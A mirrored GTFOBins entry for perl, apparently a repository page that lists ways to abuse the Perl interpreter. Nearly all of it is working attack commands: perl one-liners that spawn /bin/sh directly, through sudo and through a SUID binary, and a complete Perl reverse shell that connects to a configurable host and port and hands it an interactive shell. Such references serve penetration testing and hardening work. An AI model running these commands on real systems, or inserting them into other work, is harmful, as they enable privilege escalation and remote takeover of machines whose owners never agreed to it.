1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-07 16:16:04 +02:00
GTFOBins.github.io/_gtfobins/perl.md
2018-05-21 20:14:41 +01:00

517 B

functions
exec-interactive sudo-enabled suid-enabled reverse-shell
code
perl -e 'exec "/bin/sh";'
code
sudo perl -e 'exec "/bin/sh";'
code
./perl -e 'exec "/bin/sh";'
code
export RHOST=127.0.0.1 export RPORT=12346 perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'